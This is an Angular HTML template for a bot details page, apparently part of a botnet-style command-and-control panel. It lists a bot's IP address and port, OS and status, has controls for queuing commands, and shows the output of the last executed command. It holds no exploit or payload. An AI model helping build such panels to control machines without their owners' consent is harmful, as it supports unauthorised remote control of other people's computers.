<br/>
<div class="row">
  <div class="table-responsive col-md-12">
    <table class="table table-striped table-sm table-bordered">
      <thead class="thead-inverse">
      <tr>
        <th>ID</th>
        <th>Address</th>
        <th>RAM</th>
        <th>Last Seen</th>
        <th>OS</th>
        <th>Status</th>
      </tr>
      </thead>

      <tbody *ngIf="botDetails != null">
      <tr>
        <td>{{ botDetails?.id }}</td>
        <td>{{ botDetails?.ip }}:{{ botDetails?.port }}</td>
        <td>{{ botDetails?.ram }}%</td>
        <td>{{ botDetails?.lastSeen | date:datetimeFormat }}</td>
        <td>{{ botDetails?.os }}</td>
        <td>{{ botDetails?.status }}</td>
      </tr>
      </tbody>
    </table>
  </div>
</div>

<div class="row">
  <div class="col-md-12">
    <button type="button" class="btn btn-success btn-lg" (click)="refetchDetails()" [disabled]="refetchDisabled">
      <i class="fa fa-fw fa-refresh" [ngClass]="{'fa-spin': spinRefresh}"></i>
    </button>
    <button type="button" class="btn btn-info btn-lg" (click)="openAddCommandForm($event)" [disabled]="addCommand">
      <i class="fa fa-plus-square" aria-hidden="true"></i>&nbsp;Add command
    </button>
  </div>
</div>

<div class="row my-2" *ngIf="addCommand">
  <app-add-commands-to-bot [types]="commandTypes" (onSubmit)="onSearchFormSubmit($event)"></app-add-commands-to-bot>
</div>

<br/>

<app-commands [commands]="botDetails?.commands"></app-commands>

<div *ngIf="botDetails != null" class="row">
  <div class="col-md-12">
    <h4>Output of the last executed command</h4>
    <pre>{{ botDetails?.commandResult }}</pre>
  </div>
</div>
